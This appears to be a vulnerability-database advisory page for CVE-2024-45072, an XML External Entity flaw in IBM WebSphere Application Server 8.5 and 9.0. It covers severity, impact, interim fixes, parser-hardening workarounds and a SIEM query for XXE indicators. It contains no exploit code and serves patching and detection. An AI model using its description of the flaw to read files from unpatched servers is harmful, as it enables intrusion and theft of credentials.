Login Sign Up

CVE-2024-45072

5.5 MEDIUM
Denial of Service XXE

📋 TL;DR

IBM WebSphere Application Server 8.5 and 9.0 contains an XML External Entity (XXE) vulnerability that allows privileged users to read arbitrary files from the server or cause denial of service through resource exhaustion. This affects administrators and users with elevated privileges who can submit XML data to vulnerable endpoints.

💻 Affected Systems

Products:
  • IBM WebSphere Application Server
Versions: 8.5 and 9.0
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires privileged user access to exploit. Affects XML processing components.

📦 What is this software?

Websphere Application Server by Ibm

View all CVEs affecting Websphere Application Server →

Websphere Application Server by Ibm

View all CVEs affecting Websphere Application Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Privileged attacker reads sensitive files (passwords, configuration files, system files) and causes memory exhaustion leading to denial of service.

🟠

Likely Case

Privileged user accidentally or intentionally reads internal files, potentially exposing sensitive configuration data.

🟢

If Mitigated

Limited impact due to privilege requirements and proper XML parsing configuration.

🌐 Internet-Facing: MEDIUM - Requires privileged user access but internet-facing systems have broader attack surface.
🏢 Internal Only: MEDIUM - Internal privileged users could exploit, but requires elevated permissions.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires privileged access and knowledge of vulnerable XML endpoints. XXE exploitation is well-documented in security community.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply Interim Fix PI99870 for 8.5 and PI99871 for 9.0

Vendor Advisory: https://www.ibm.com/support/pages/node/7173263

Restart Required: Yes

Instructions:

1. Download appropriate interim fix from IBM Fix Central. 2. Stop WebSphere Application Server. 3. Apply the fix using IBM Installation Manager. 4. Restart WebSphere Application Server. 5. Verify fix application.

🔧 Temporary Workarounds

Disable XXE Processing

all

Configure XML parsers to disable external entity resolution

Set XML parser properties: FEATURE_SECURE_PROCESSING=true, DISALLOW_DOCTYPE_DECL=true

Input Validation

all

Implement XML schema validation and sanitize XML inputs

🧯 If You Can't Patch

  • Restrict privileged user access to XML processing endpoints
  • Implement network segmentation and monitor for unusual XML payloads

🔍 How to Verify

Check if Vulnerable:

Check WebSphere version and if interim fixes PI99870 (8.5) or PI99871 (9.0) are applied

Check Version:

$WAS_HOME/bin/versionInfo.sh (Linux) or versionInfo.bat (Windows)

Verify Fix Applied:

Verify interim fix installation via Installation Manager and test XXE payloads

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML parsing errors
  • File access attempts via XML entities
  • Memory exhaustion warnings

Network Indicators:

  • Large XML payloads with external entity references
  • Unusual requests to XML processing endpoints

SIEM Query:

source="websphere" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*")

📊 Metadata

CVE ID: CVE-2024-45072
CVSS v3 Score: 5.5 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L
CWE: CWE-611
Published: October 16, 2024
Last Updated: October 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-45072, you might also want to check these:

CVE-2022-22486 10.0

This CVE describes an XML External Entity (XXE) vulnerability in IBM Tivoli Workload Scheduler that ...

Same vulnerability type (CWE-611)
CVE-2025-30220 9.9

This XXE vulnerability in GeoServer's GeoTools Schema class allows attackers to read arbitrary files...

Same vulnerability type (CWE-611)
CVE-2023-27874 9.9

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) vulnerability that allows au...

Same vulnerability type (CWE-611)